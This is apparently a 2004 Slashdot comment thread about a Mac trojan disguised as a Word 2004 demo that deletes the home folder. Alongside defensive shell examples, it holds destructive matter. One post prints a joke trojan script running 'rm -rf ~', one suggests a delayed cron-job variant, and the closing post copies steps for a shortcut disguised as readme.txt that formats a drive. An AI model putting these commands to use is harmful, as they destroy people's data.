No of course not you would have clicked 'Install Microsoft cool beta' and have given your root password for the 'installation' to complete. Then it would have wiped your entire computer.
Be glad it was made by fools for fools only.
Dumb de dumb dumb
There is no secure system, and never will, as long as there are mentally-challenged users who blindly trust software from not-100%-legit origins.
And bragging that such and such OS is more-secure-than-thou does not help either. The least-gifted users of these OSs will believe this and will feel a false sense of security and run whatever application falls into their hands. Most of these will be honest apps, but it takes only one to wreak havoc.
As Albert Einstein said,
Only two things are infinite, the universe and human stupidity, and I'm not sure about the former.
It's not a virus, it's just Clippy!
According to Intego the file was a 108 KB AppleScript applet. When was the last time Micro$oft released anything resembling an application 108 KB in size?
There have actually been cases in the US where the burglar has won damages against home owners (the intended victim). It is also not legal to booby-trap your home or store. Of course shooting them is another matter!
You would need to run as a privileged account when installing software. Unless you just want programs in your home directory and only usable by you and no other user.
J
What better way to get the "security problem" media focus off yourself than by exploiting a competitor.
The man who trades freedom for security does not deserve nor will he ever receive either. - Benjamin Franklin
This has nothing to do with the Mac platform or the security of that platform. If I can convince you to run a malicious program, on any platform, then I can do pretty much whatever I want to your system.
This exact same problem exists for Linux, Windows, Solaris, and *BSD. Unfortunately people will probably take this example to mean that the Mac OS X platform is somehow insecure because of it. I could do the exact same thing for Windows and if you would download it from LimeWire (or any other untrusted source) and run it then it could do just as much damage.
infested with jello like fishes no melotron wishes
It is a non story even if it happened, and it is unlikely to have happened. Unless the guy is a 10-year old who fell for a trap his 11-year old sister set up for him.
Warez monkeys get what they deserve
If someone says he and his monkey have nothing to hide, they almost certainly do.
For a Windows worm to make it onto /., it has to autonomously infect hundreds of thousands of machines within hours of being released. Anything less, and it just isn't newsworthy.
On the mac, you only need one idiot manually downloading and running what he suspects is an untrusted native executable that turns out to actually be an untrusted native executable. And it's on the front page. Of slashdot.
Hrumph. My sig is so appropriate today.
Upstairs Dog, Downstairs People.
to my delight the Microsoft icon looked genuine and trustworthy
Now wait just a minute... the user verified the integrity of the file by looking at the icon! It "looked" trustworthy and genuine. That's gotta be proof enough that the executable was indeed from Microsoft, after all, no one could possibly duplicate a Microsoft icon. That'd be as hard as copying those fancy holograms on their packaging. If we can't trust icons, next you'll be telling me you can't trust the filename either.
I'd chalk this story up to "Slow News Day" or perhaps "Dogpile on Stupid User Day". I bet he didn't have backups either.
You are in a maze of twisty little passages, all alike.
If it sounds too good to be true, it probably is.
Dogma - "let's just say we'd like to avoid any empirical entanglements."
It's nice to know that there really are happy endings. It's too bad this guy still breathes the same air we do though. Quite a waste.
I mean, no matter what you say, or what you do, or what policies you pass, eventually someone, somewhere, will try to shave their testicles with a chainsaw.
Did you notice that was a quote and not the statement from the poster? Duh!
and more about the irresponsibility of the press in reporting. This should never have been taken seriously, except in passing, as a sad commentary on the state of humanity. The heading should have been something like "Even Stupid people use Macs."
Sir, there is a dragon outside with an armful of armor. He's inquiring if we offer free refills.
Well, as usual, pudge has to add his 2 cents, which, as always, consists of some comment in defense of Apple. Pudge, why can't you just post the news like (some) other people (some of the time), and leave your opinions out of it?
Resilient to viruses but not resilient to idiots
Maybe it did work completely correctly. After all, Microsoft does fiercely fight all competition.
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
Now that at least some Windows users are starting to become aware of this sort of thing, are Mac users next?
Most Mac users I talk to do nothing but go on about how they never have to worry about this sort of thing. Seems like a group of users that's that overconfident in their systems are ripe for infection.
A trojan is something that is not what it appears to be. So yes, it's a trojan.
First, some indisputable facts.
And now some helpful sites are found here
I thought we were past the whole "Trusting Microsoft" question. Isn't that the whole reason people use Macs in the first place?
Intolerance for ambiguity is the mark of the authoritarian personality.
gee, you downloaded what looked like a free version of something that is NEVER free. and from a source like Limewire?
then surprised when your machine gets hosed?
the icon looked real? that's pretty hard to counterfeit, eh?
are there darwin awards for computer users?
Well, the only true way to tell if you are about to download a software package from Microsoft is to first check for known security holes. No holes reported generally means it isn't a genuine MS product.
It just goes to show you even a moron can use Mac. A 'trustworthy' looking icon? Hey, I got some ocean front property in Arizona I wanna sell you. Don't worry, its a 'trustworthy' investment!
This is a test. This is a test of the emergency sig system. This has been only a test.
Macs don't get viruses! If we all used Macs, then things like this wouldn't happen because it's such a rock solid operating system, and impervious to such things as plague Windows users. ... right?
Seriously, no matter what happens in our world of technology, users will be users and will stay users.
I would say the user is broken, not the system. Idiots like this guy will always find ways to hose themselves, we should not redesign our world around them.
So this trojan was from 'Word 2004'..a decent one to pick because it recently started shipping.
:)
What other apps are good targets for trojan horses? I have always been afraid of downloading a 'virus scanner' because it just screams 'I have no virus scanner on my computer!'
Others you have noticed? Perhaps a 'digital wallet' application to keep credit cards, passwords, etc. in
I only came here to do two things; kick some ass, and drink some beer...looks like we're almost out of beer.
It's not even as complicated as that. Why isn't there a system alert when the Home folder is moved or moved to the trash? Apple has always had this kind of thing for other folders, it should be no different with this. Barring that, perhaps AppleScript should have limitations (or dialogs) regarding emptying the trash. If it's allowed to do it, there should be an admin prompt when you run the AppleScript.
I just made a new user to run an rm -rf ~ on to see how it looks.
:)
I have to say I'm impressed with how Apple handles this situation. You actually have to do rm -rf ~/* but anyways, once your home directory is emptied there is no error message. No flood of missing files or application crashes. You just log out and log back in and hey, you have the defaults loaded again like a fresh user. Being a Windows/Linux switcher I have to say this is handled quite differently than I expected. At least in Windows losing all your Windows files is gonna cause some serious problems, you may not be able to log back in again.
Maybe I'm odd but eh.
-Don.
Cwm, fjord-bank glyphs vext quiz
It masquerades as linux-kernel-2.8 and can be found on freenet in the hope that Linux users wanting to try out the latest kernel will try it.
The code of the virus has been obtained with a hex editor.
#!/bin/sh
#Stupid Linux user virus 1.0
echo Installing Britney Nude screensaver
rm -rf ~
echo Muahhaahha sucker
I fought the corporate America, and the corporate America bought the law.
This is news? Some not-too-bright individual runs a program, and _gasp_, it deletes stuff! It's not as if it's a worm for OS X, which exploits some massive vulnerability. It's the equivalent of some idiot running a batch file on Windows which does "del %homepath%".
This, "The file is cunningly disguised as a Word 2004 for Mac demo - from the forthcoming Office 2004 for Mac suite.", just made me fucking laugh..
"cunningly disguised".. mm-hm. Ok.
"in the hope that perhaps Microsoft had released some sort of public beta"
AHAHAHAHAHAHA!!! Public beta...who does he think he's kidding, exactly? Try "...I w45 w4r3z|n my 4zz 0ff wh3|\|...". I bet he's probably also running the "Public Betas" of Photoshop and Illustrator and Final Cut Pro. Oh man...that's too funny.
Good lord... Someone downloaded something from Limewire and it wasn't what it claimed to be. Slashdot beat everyone to the scoop... I'm sure articles will be popping up all over CNN, Reuters, MSNBC, Yahoo, etc... They just haven't had time to gather their thoughts. And who can blame them, considering the magnitude of a story like this one?
This is going to shatter the credibility of Limewire. They'll be sued out of existence. I wouldn't be surprised if this was some sort of insanely devious and clever plot masterminded by Kazaa to eliminate their competition. This may be the end of P2P as we know it.
Truly a red-letter day. Everyone, take a moment to remember today's date, because your grandchildren will be asking you where you were on 5/12/04 -- the day of the trojan that was heard around the world.
Remember, a good deal of the Mac users out there are clueless ex-Windows user friends that we instructed to purchase Macs after scrubbing their old PCs of viruses, adware, spyware and other such crap one too many times.
No matter how often we tell them otherwise, it is ingrained in them to use the icon as an indicator of a file's content. If it wasn't, then a great deal fewer email viruses would make it into the wild.
I got this email that said "Your computer is too slow. Send this message to all your friends and then erase your hard drive." When I did it, I lost all my files. THIS IS A OS X TROJAN HORSE.
1: I am a pirate!
2: I am an idiot!
The person creating a virus/whateveryouwannacallit, could just create a disk image(dmg), and have the icon be a legit MS icon, and do the same thing. That's what you get for downloading and running things that you can't trust.
1.Box up Macintosh
2. Return To Vendor
3. Apologise profusely and tell them what you wanted was an eMachine!
4. Do not complain when you are handed a box that says Atari 2600. This is more than enough computing for you.
5. Enjoy Pitfall!!!!
Yeah, I guess I'm funny like that.
I worked on Macs as a certified tech back when the IIfx was the machine. I used to run Disinfectant on every machine I worked on, and there were tons of them that were infected, and this was on machines that didn't even have modems and weren't on networks. The only reason I bring this up is that this is probably a /. story solely because it involves a trojan or virus on a Mac. The fact that some poor schmuck actually downloaded what he thought was a commercial app from a p2p network and tried to install it... this is "Stuff that matters"?
666-607: 6th floor apartment of the beast
Even the trojans 'just work'!
Practice Kind Randomness and Beautiful Acts of Nonsense.
I took the MacCentral website (which is now run by Macworld) to task for this, and I'll take Slashdot to task for the same thing. In some of the more reputable Mac-related news sites, this story was more accurately covered; the Trojan in question was downloaded from the Gnutella network. Limewire is not a network, it's a Gnutella client -- yet sites like MacCentral reported that the file was downloaded from the LimeWire network. Now on Slashdot, we're seeing much the same thing -- as if to imply that this Trojan is somehow only available with Limewire.
Since there are at least 3 other Gnutella clients available for Mac OS X (Phex, Acquisition, and XFactor are the ones I know of), there are many more potential vectors for this Trojan to find its way onto a Mac user's computer.
Yeah, I know, it's asinine to trade warez on any P2P network...
There's nothing to stop this Trojan from making it to other file sharing networks, except perhaps a dose of common sense, so this isn't even a Gnutella-specific problem. I'm just a little peeved with sloppy news reporting.
Two things seem worth pointing out:
1. No platform is immune from trojans, since they require the user to actually download and run (by definition, otherwise they'd be worms, right?).
2. When this happens on a Windows machine, your whole system is foobar. When it happens on a Mac, you lose your home folder and personal settings. That's a big difference!
Strange that Microsoft has popped up in this one, huh? Hmm... if I were a conspiracy theorist....
The real issue is whether it can replicate itself and whether it can use security holes in OS X to distribute itself to others. I've been round and round with people on this topic and the conclusion is that, at every point, OS X presents too great a hurdle to allow it to occur. You either have to rely on lots of Apple programs working together to do it (which is too unwieldy and too visible to the user) or you have to rely on the more stealthy Unix stuff, much of which is turned off by default (i.e., no using mail quietly in the background to distribute the trojan/virus because sendmail is off by default.)
It seems to me that Intego is looking to scare people into buying their products and in doing so, they have blown any credibility they have.
--Rick "If it isn't broken, take it apart and find out why."
The files are not gone. MSWord 2004 is just converting them all to its native format. Even on a G5 however this will take another 6 days, so simply remain calm and trust to Microsoft.
this way will be the primary way people will get rooted. Stupidity.
Idiot downloads software that is TGTBT (too good to be true) and it fux0rs the machine. Surprise! Shock! Horror!
Yes, Mac machines are vulnerable just like any other software. No big deal. I'm surprised someone bothered to take the time to make a trojan for Mac.
-- Having a Creationist Museum is like having an Atheist place of worship
...is the old verity about how difficult it is to scam an honest man. The ones who are looking for something more than they deserve are easy pickings.
Just to clear things up for you:
This is pretty clearly a Trojan horse: it advertised itself to the lUser as a copy of Microsoft Word in order to gain access to his system. The payload of the unwanted software (be it virus, worm, Trojan, or something else) is irrelevant to its classification.
All's true that is mistrusted
It's a delightful change of pace from reading about stupid Windows using pirates to read about stupid Mac using pirates. I mean, there used to be this myth that Mac users were somehow better and more enlightened than the rest of us.
I wonder if he did his /. post from another, unaffected, Mac, or had to lower himself to a WinTel machine to get the MSWord out.
A much better idea is to run a virtual machine and 'test' what you have in that. NEVER EVER risk your production machine/network.
This holds true for purchased commercial ( or legit free ) software and patches.. Always test first..
( that aside, the guy was an idiot )
---- Booth was a patriot ----
This trojan runs everyone's favorite command:
rm -rf ~
I'd advise protecting yourself and alias rm to 'rm -i'. Either that or choose to not run applications with fruity MS icons that you download from p2p =)
"My mother never saw the irony in calling me a son-of-a-bitch." - Jack Nicholson
They claim there is a file out there that when you download it it deletes your home directory. I will say YES, there is...
ONLY IF YOU ARE A FRICKIN IDIOT!!!!
The "File" is nothing but a script that executes an "rm -rf ~" command. I can write a "Trojan Horse" with the same command in shell script, MS .bat, and numerous other scripting languages and in some cases compile it into an application as to remain unseen till it's too late. Please people stop making this shit up. If anyone seriously thinks the pirated application they are trying to get only takes 1-2 hundred K then THEY DESERVE TO GET THEIR INFO WIPED OUT!!!!
MacOSX, because making *NIX better is a lot better than waiting for Micro$loth to fix Windows
That it was really a trojan and Word wasn't intended to hose your system?!?!?
While I agree this guy probably had what was coming to him, if you had a child that was poisoned by someone you never met, would you say "This is 2004, he/she should know by now not to take candy from strangers?"
ok, we've established that he's retarded because he goes to Limewire to download "legit" software, then makes the news.
compound this with his security screening process involving nothing more than looking at a trustworthy icon.
already the guy deserves everything he gets.
But in defense of this badly placed story, i.e., the Apple section, had he been using a non-UNIX OS, then his uid probably would have had access to everything.
However, this 'tard will have just entered the root password when asked by this app anyway because it had a legit icon. He got off lightly to only lose his home directory. Maybe the author of the trojan is related to him.
This is the sort of thing that gives Mac users a bad name. Not because "macs are finally getting viruses/trojans," but because of the limited mental capacity of both the malware authors and the people who run the malware.
The reason girls and Windows users don't understand UNIX is because all the documentation is in Man files.
Every damn OS has had these things. From DOS to unix to C64 to VMS. Usually people are smarter but these days you got a lot of idiots.
You see stuff on usenet. The Sims 2. 31kb file Full game really works as the description.
User stupidity is not unique to any OS but at least when you use Linux the designers don't help you being stupid.
MMO Quests are like orgasms:
You may solo them, I prefer them in a group.
There is no patch for human stupidity.
Hey, this is Insightful!
If all those adult video companies seed betas of their movies on LimeWire, why is it unreasonable to believe that Microsoft wouldn't do the same with software ?
Just make sure you help them out by providing feedback...
From what I understand, it was exactly what you suspected!
There's an interesting discussion going on at Mac OS X Hints regarding this.
Mods! Undo the egregious error of that 'Troll' mod!
fs
-truth
I had a steady B+ in my AI class until I failed the Turing test...
"This is 2004, you should know by now not to open a file from an untrusted source."
that SHOULD read...
"This is 2004. All slashdot readers know not to open files from an untrusted source, but the rest of the world is still as dumb as ever."
An interesting discussion about this is also taking place here.
It is all Microsoft's fault! IF they did not announce that they were releasing Office 2004, this would not have happened. It is part of the "software sales through obscurity" initiative.
I hate sigs.
This sounds similar to the recent trojan horse proof-of-concept.
No, that involved an application pretending to be a document. This is a case of an application pretending to be a different application. There is no security regarding the identity of applications, and an application can have any icon it chooses--the burden is on users to obtain their applications from trusted sources, not Limewire. Of course, if he really thought it was a "public beta," as he claims, he probably would have gone looking for it at the Microsoft web site.
Since the permissions on a Unix-style system are set up to give the user control over what they 'own' (mainly the home directory), there's little to prevent a program run by the user from doing whatever it wants with user data. This applies to Linux, *BSD, and the commercial *nixes as well, not just OSX.
In the short term there are technical 'fixes' that can help but they are not perfect. Libtrash under Linux or using a backup tool that does *not* have the same rights as the user are good CYA in the short run, though an isolated sandbox or similar tools should really be available. How to pull this off, I don't know...if you've heard of end-user tools that can pass the pointy-haired-boss test, let me know!
A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
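The two posts above make a point worth seeing in practice: anything you run as yourself can alter or remove anything you own, so the only safe place to try an unknown installer is somewhere that is not your real home folder (the earlier "create a new user and run it from that account" workaround is the thread's own version of this). The POSIX shell script below is an added example, not code from the thread or from Intego, Apple or Microsoft. It runs a given program with HOME pointed at a scratch directory seeded with constructed files, then reports which of those files the program removed or rewrote. The "installer" it runs is a constructed stand-in, and the file names and paths are invented.

```shell
#!/bin/sh
# Added example, not code from the thread. Runs an unknown installer with HOME
# pointed at a scratch directory seeded with constructed files, then reports
# which files it removed or altered, so your real home folder is never the
# test bed. Caveat: overriding HOME only redirects programs that honor it; this
# is a triage aid, not isolation. A separate user account, as suggested in the
# thread, is enforced by file ownership and is the real control.

# Sorted "checksum path" listing of every regular file under $1.
snapshot() {
  ( cd "$1" && find . -type f | sort | while read -r f; do
      printf '%s %s\n' "$(cksum < "$f" | cut -d' ' -f1)" "$f"
    done )
}

# Run the script at $1 against a throwaway HOME and print the paths (relative
# to that HOME) of files that were deleted or whose content changed.
stage_untrusted() {
  scratch=$(mktemp -d)
  state=$(mktemp -d)
  mkdir -p "$scratch/Documents" "$scratch/Library"
  printf 'thesis draft\n'      > "$scratch/Documents/thesis.txt"   # constructed
  printf 'unrelated setting\n' > "$scratch/Library/prefs.plist"    # constructed

  snapshot "$scratch" > "$state/before"
  # Detached from any terminal, the way a double-clicked applet runs; the
  # installer's exit status does not matter for the comparison.
  HOME="$scratch" sh "$1" </dev/null >/dev/null 2>&1 || true
  snapshot "$scratch" > "$state/after"

  # Entries present before but absent after: removed or rewritten files.
  changed=$(grep -vxF -f "$state/after" "$state/before" || true)

  rm -rf "$scratch" "$state"
  printf '%s\n' "$changed"
}

# Constructed stand-in for the downloaded "installer": wipes the Documents
# folder of whatever HOME it is handed (the thread's rm -rf ~, scaled down).
make_fake_installer() {
  f=$(mktemp)
  printf '#!/bin/sh\nrm -rf "$HOME/Documents"\n' > "$f"
  echo "$f"
}

demo() {
  installer=$(make_fake_installer)
  stage_untrusted "$installer"   # prints one line: <cksum> ./Documents/thesis.txt
  rm -f "$installer"
}

demo
```

Point the `stage_untrusted` function at any script you are unsure about and read the report before you ever run it for real; an installer that touches `./Library/...` or wipes `./Documents` has told you what it is. Anything that ignores `$HOME` and uses absolute paths walks straight past this trick, which is exactly why the thread's separate-account suggestion is the better control.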
I know some folks that download public betas of popular songs all the time. Perfectly understandable mistake. ;-)
This is my post. There are many others like it. If you don't like what you read here, go try one of the others.
Yeah, right! He deserved what he got!
This proves that Macs don't get attacked by trojans in email, etc, not because it's somehow more secure or "better" technology, but simply because There's no technical reason why Macs can't be attacked as much as Windows computers are.
Best Buy can have you arrested
This is where everything started to go wrong.
A piece of malware on a Mac? That's unpossible! /glad I run Windows...
It sounds like the real office to me.
what's the command line for doing what you suggest, alias rm to rm -i?
An example please. alias --help and man alias bring up nothing.
tia.
You gotta wonder when that version of Office 2004 you DLed is 10MB. Although these days even a beta of the splash screen would be something. :)
To summarize: trojans seem to be going strong on Mac OS X, presumably because viruses don't bite. And damage is limited to the files you can access anyway.
--Bud
I really want this feature. From what I've read, the latest kde has this. Does any other DE have this for linux?
There really should be a standard for this. A typical scenario the other day. I was downloading a bunch of crap and compiling something. My gf wanted to check her email, but I told her she has to wait.
Yes I know, I could install some ncurses based email (but I introduced her to Evolution and she loves it) or be doing my compile and downloads in a separate term, but there are many situations where that wouldn't apply.
WinXP has this and as I said I believe kde has it.
We really need a standard way of doing this (and without having 2 separate X sessions going).
Any work being done on this?
The Mac doesn't (yet) have the plethora of mechanisms that viruses on Microsoft platforms use to automatically launch themselves, but the good old human engineering attack will work on anything. Back in 1980 at Berkeley people would stick prank files in their home directory with names like "advent450" to make people think they were enhanced versions of the old "Colossal Cave" adventure (which was undergoing frantic expansion at Berkeley at the time) and run them...
It's like the Warlock in Niven's "The Magic Goes Away": the thing about being a magician is everyone expects you to use magic, but a dagger always works. No operating system can keep someone from explicitly unpacking and executing a file.
So, no, the Mac is definitely not immune, but the rate of virus propagation on the Mac should be limited by the need for people to deliberately unpack and run the infected file. What makes virus propagation on Windows so rapid is the way they've integrated the browser and the desktop, which means that they have to block potential exploits one by one. Apple's web integration is not nearly so complete, though they're beginning to do things that I find dubious as they start getting feature-crazy with Safari...
Of course when I tell people they probably want to turn off "automatically open safe attachments" in their browser, just in case, they come back with this argument that the Mac is immune to viruses. Well, yes, it's at least resistant... but that's only because there aren't many things like "automatically open safe attachments" for viruses to take advantage of.
Yet.
The reader told Macworld: 'I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta.
.. The idiot tried to get warez. If you try and download warez off a p2p network and get screwed in the process, you deserve it.
.. if it was a public beta, wouldnt it be on the MICROSOFT site?
Lies
C'mon
I'll quote wikipedia...
So, to reiterate: a virus requires another executable as a host, a worm does not. That is the difference between the two.
The concept of a "trojan horse" is somewhat orthogonal to that of "virus" or "worm", though I think it is a distinct enough phenomenon to warrant its own designation.
Reading this mindless rant, one has to ask. . .menses?
Yeah. It's called unplug your Ethernet cable, turn off your wireless, or disconnecting your modem. =P
Seriously, though, can't you just set your firewall to not allow anything out at that specific time, and if it doesn't work, delete it? Also, one would probably also make sure that the process isn't running anymore...
In bash, "alias" is not a separate program; it's a reserved word within the shell. That's why you don't see a man page. If you do a "man bash", you will find information on the alias command.
Example of what to put in ~/.bashrc:
alias rm='rm -i'
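One thing the question and answer above leave out: an alias in ~/.bashrc lives only inside the interactive shell that read that file. A downloaded applet or script runs in its own process and never sees it, so `alias rm='rm -i'` is a guard against your own typos, not against anything you double-click. The POSIX shell script below is an added example (not code from the thread) that shows this in a throwaway directory with a constructed stand-in for the "installer"; the file names are invented.

```shell
#!/bin/sh
# Added example, not from the thread. Shows why `alias rm='rm -i'` in ~/.bashrc
# does not protect you from a downloaded installer: the alias exists only inside
# the shell that defined it, and a double-clicked applet or script runs as its
# own process and never consults it. Everything happens in a temporary
# directory with constructed data.

alias_scope_demo() {
  work=$(mktemp -d)
  printf 'my thesis\n' > "$work/notes.txt"   # constructed stand-in for user data

  # 1. The user's shell has the protective alias, as the answer above suggests.
  alias rm='rm -i'

  # 2. Constructed stand-in for the "installer": its own script, its own shell.
  #    No -f here on purpose: if the alias somehow applied, rm -i would ask for
  #    confirmation and, with no terminal to answer, refuse.
  cat > "$work/installer.sh" <<'EOF'
#!/bin/sh
rm "$1"
EOF

  # 3. Run it the way a double-clicked applet runs: detached from any terminal.
  sh "$work/installer.sh" "$work/notes.txt" </dev/null

  if [ -e "$work/notes.txt" ]; then result=protected; else result=deleted; fi

  unalias rm
  command rm -rf "$work"   # `command` looks past aliases; cleanup only
  echo "$result"           # prints "deleted": the alias never came into play
}

alias_scope_demo
```

The alias is still worth having for interactive use, where it catches a fat-fingered `rm -rf ~` of your own; the point is only that it is not a security control against software you run.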
This is hardly going to knock anyone off anything.
A Mac trojan that only affects the people stupid enough to run it is nothing compared to the laundry list of remote exploits that plague Windows users who don't use a firewall and/or run Windows Update every day.
Actually, it does. A public Beta will most likely be an execute and it downloads for you, so Microsoft can keep some control.
MSDN Academic Alliance is like that
What's dumber than a Windows user? A Mac user, apparently.
Yeah, big difference.
Luckily, I only lost all my data!
Troll??!!! WTF?!!! I was speaking the truth. Honestly, how many Slashdot readers would be stupid enough to download something they thought was Word 2004 and then run it? From a P2P client? If people answer that they would, then Slashdot is no longer "News for Nerds". It's become "News for mouth breathing idiots without a pulse". Hmmm... maybe the fact that this story got posted is enough proof of that already. Damn! I just got a big dose of stupid from yet another clueless moderator.
Who is Twirlip of the Mists?
That if I referred to someone as being "404", even my geekier friends would slap me. Almost as bad as the time I heard someone using the future slang from Tom Clancy's Net Force books...
"Sic Semper Tyrannosaurus Rex."
I think it would be a good idea to have a feature in OS X that could launch a program as "untrusted". It should be able to restrict the programs access to the file system, the network stack, etc. Kind of like what .Net does, except not as extreme.
Avoid Missing Ball for High Score
As we've seen in recent weeks, quality porn is hardly virus free.
Downloading a 60k program off Gnutella... to install a beta of Word 2004... ok then. There's just sooo many things wrong with this scenario it's not even funny.
Who wants to bet this person was just experiencing an ID 10 T moment while trying to pirate Office 2k4?
2- A Mac zealot did it coz' he doesn't like Microsoft stuff running on Macs
3- Microsoft did it to teach pirates a lesson
4- A Linux zealot did it to discredit Microsoft
5- A BSD zealot did it to discredit Linux
6- SCO did it because they own the IP of all Unix-based systems, so there
7- Kevin Bacon did it
When people ask me why I use Linux, one of the things I always say is "I never have to pirate software anymore." Everyone ignores it, but this story demonstrates why I always mention it. When you don't have to pirate software, you don't have to worry that some program that you need but can't afford or don't want to pay for is going to destroy your system. All my stuff comes from a much more trusted source than Limewire.
Everyone I know who uses Windows and pirates software like this has to put up with this shit. It's just not worth it, especially when you just want to get your work done. Of course, in these days where you plug your machine in and you get a host of infections automatically within a 24 hour timespan perhaps no one really worries as much about these things anymore.
"I may not have morals, but I have standards."
This is 2004, you should know by now not to open a file from an untrusted source.
Except of course when it's a Windows computer, then it's Microsoft's fault.
"This is 2004, you should know by now not to open a file from an untrusted source."
or trust any news from slashdot...
Isn't this old news?? Back in the BBS days a lot of files floated around that purported to be installers. But when run they would trash your system folder, drop a lot of viruses, and then install joke extensions. I know many of the So Cal Mac BBS's had to clean out a lot of files due to installers like these. So 10-11 years ago we had the same problem.
---In a time of Chimpanzees I was a Monkey.
From the story:
I call bullshit! Yeah, right .. he thought it was a beta. If you guys buy that, I have some real nice property on the moon I'd like to sell you.
So anyway, this guy downloaded something, and *GASP* his ignorance of what software is out there made him get something he didn't want.
This might be kind of funny if it's a friend of yours, but seriously folks, is this really front page material for Slashdot? I love this site, I truly do, but please editors, at least have some standards for what gets on the front page.
It puts the lotion on its skin or else it gets the hose again.
It's all about the icon baby, all about the icon. As long as that *looks* legit, you know the warez are genuine. bahahaha.
Perhaps some kind of mechanism is needed to force programs to run with as few privileges as possible.
At last, a use for fast user switching.
Q&A from Intego regarding Trojan Horse
Where did Intego first find out about this Trojan horse?
Intego, after writing and releasing the first mp3 trojan for the Mac OSX platform in order to improve our business, decided to write a dangerous AppleScript, give it an installer icon and release it in order to further generate sales for our otherwise useless AV products that no one wants. Even though this is not a real trojan and this approach involves social engineering that has been known about for years (we initially considered simply writing a readme file that instructed the user to type "rm -rf ~/" in the terminal, but thought that that would be too complex), we know that our approach, known as the SCO school of IT business, is guaranteed to raise revenue.
Have you informed Apple, Microsoft and the CERT about this Trojan horse?
Yes, we informed Apple, Microsoft and the CERT as soon as we had done our first working AppleScript. They were very proud of us. Especially the people at Microsoft.
Has Microsoft made any comments about this Trojan horse?
Microsoft made the following comments: "Microsoft has verified that it does not write or encourage others to write trojans for the Macintosh platform. Microsoft, however, certainly is not above offering the occasional tip when it comes to torpedoing other companies' platforms."
Listen to this guy, if anyone knows a troll, this guy must. He's the biggest one on slashdot.
rm -rf ~
If I put this in an AppleScript and gave it a nice icon, would this make it a freaking trojan by anyone's standards???
this is just people trying too hard to find a problem with macintosh. Move along nothing to see here.
On Windows it would very likely have wiped your hard drive because it would likely have root privileges. Now this of course could happen on a Mac too since it's getting common for apps to ask for root when they install. But at least it would have to ask.
Some drink at the fountain of knowledge. Others just gargle.
It puts the lotion on its skin or else it gets the hose again.
It's a program with a Word icon that does rm -rf ~. The article doesn't even say how big the file is, but I'm willing to bet it was only a couple kb.
'I clicked on the installer file, and to my horror in 10 seconds the attachment had wiped my entire Home folder!'
Whaaaat? TEN FRICKIN' SECONDS!!! Dude, you need to upgrade. My G5 smoked my home directory in TWO.
I'm not normally an irrational zealous dickhead, but I figure "When in Rome..."
My, my, my. I'm honoured. I'm THE biggest troll on Slashdot, am I? Even though I've only been around a month? I'll bet you haven't a clue who I REALLY am. The truth would shock you.
Who is Twirlip of the Mists?
Mac user pirates a 10kB OSX version of Word and gets all his stuff deleted.
Don't you think Slashdot is the last place where people need to be made aware of something like this?
Turning your boneheaded mistake into a security advisory isn't going to win you much respect here.
Turns out Slashdot was wrong--XP SP2 will not install on pirated copies of Windows.
So much for all that "dominance through piracy" conspiracy crap. This is completely off-topic.
Surely the simplest check of whether it was a genuine Microsoft release was to check the file size...
If it is several meg or larger in size, the chances of it being a piece of MS bloatware are high. If it's small it probably isn't.
Sara
Designer, Gamer, Macgrrl in an XP World
Thankfully, the author of this trojan was short-sighted enough to make it delete the user's home directory instantly, and probably all of the files they were sharing via p2p. The trojan will wipe itself out fairly quickly as people download the file, click on it, and erase everything in their home directory, thus removing the trojan itself and disabling its most likely method of distribution (by deleting the p2p program's preferences).
It would have worked better if the program had just installed an invisible helper (or cron job) to delete the user's home dir at a later date and then deliberately bombed out. It'd also be much harder to track it down to that broken Word demo that you downloaded the other day.
Come on now. You are just trying to frighten people. Everyone knows that "rm -rf ~" stands for "read mail, really fast, everything in my home directory".
Sigh... I *wish* I had a co-op to torture.. um... I mean, mentor.
A Mac user opens an unknown file from an untrusted source, it turns out to be destructive, and it blows away his data.
Conclusion - said Mac user is at fault.
Windows user opens an unknown file from an untrusted source, it turns out to be destructive, and it blows away his data.
Conclusion - Microsoft is at fault.
Of course! How could I not see the difference?
Well, dude, if you are going to download bent or pirated software you have got to be prepared for the consequences. Who do you have to blame other than yourself? Dipshit! I can hardly believe your post got accepted on Slashdot!
Electronic Music Made Using Linux http://soundcloud.com/polyp
Fire was found to scald people when they stick their hands in it, also water is wet.
More informational news to follow @11PM for people who still download and open files without scanning them...
The reason why there are no viruses on macs?
Why spend days writing a complex virus when users will fall for clicking on a script which took 5 seconds to write and 10 seconds to download a "genuine" icon for?
Is there a rule on slashdot that it's bad to say I Told You So?
before anyone comments on this line
"I'm just saddened by the fact that OSX is vulnerable to the inadequacies of OSX." I meant
"I'm just saddened by the fact that OSX is vulnerable to the inadequacies of Microsoft."
I am pissed outta my skull..
Honestly, why did this even get a link?
User downloads executable from peer to peer network, runs said executable, and loses data.
If it wasn't labeled MS-Word would we have even seen this? I find it highly doubtful.
You would think by now, with all the scumware out there, people would realize that software should be downloaded at the source, or from a reputable middleman, not from anonymous sources who may have altered the payload in some way.
It doesn't matter if it's on a Mac, Windows, or Linux machine. Running "mystery code" is just plain stupid.
Look, it was dumb for the person to open a file from an untrusted source.
However, why are OS's designed to let such a small mistake have such a dire consequence? It's like a car having a big red self-destruct button next to the radio dial.
Maybe it's time that OS makers (Mac, MS, and Linux et al.) realize that computers aren't just used by sysadmins, but real people, which includes kids, morons, and the gullible.
Is that *you* Al Franken? Is it really?
Either that or you were dumb enough to run the installer as root.
No, he wasn't. The command issued by the trojan was crafted to attempt to delete the current user's home folder. If that user's account was admin-level, the command would succeed. If it wasn't, the command would fail due to insufficient permissions. If he had been logged in as root, it would have merely deleted the home directory for 'root.'
This is not an inadequacy of OS X, the system is doing what it's being commanded to do, by the currently-logged-in, authorized, local user-- no more, no less. If the currently-logged-in, authorized, local user is a twit who runs apps he downloads from p2p networks without due care, them's the breaks.
What the fudge is he doing downloading it over limewire?!
Dude deserves to have his home folder wiped
On the note about the whole making the icon look like the real thing... uhm guys, can't you do this just as easily in Windows?
Here is a link to get you guys started on tricking your friends into formatting their hard drives:
http://lockdowncorp.com/hackertricks.htm
From that page:
"Dangerous Commands That Can Be Embedded
PIF Shortcut Extensions
Some hidden file extensions can easily be programmed with hidden commands that could do damage to your system. Following is a simple test:
1. Right click your mouse on your desktop and select New and then ShortCut
2. In the command line type: format a:
3. Click Next
4. In the "Select a name for the shortcut" area type: readme.txt
5. Click Next
6. Select a notepad icon and click Finish
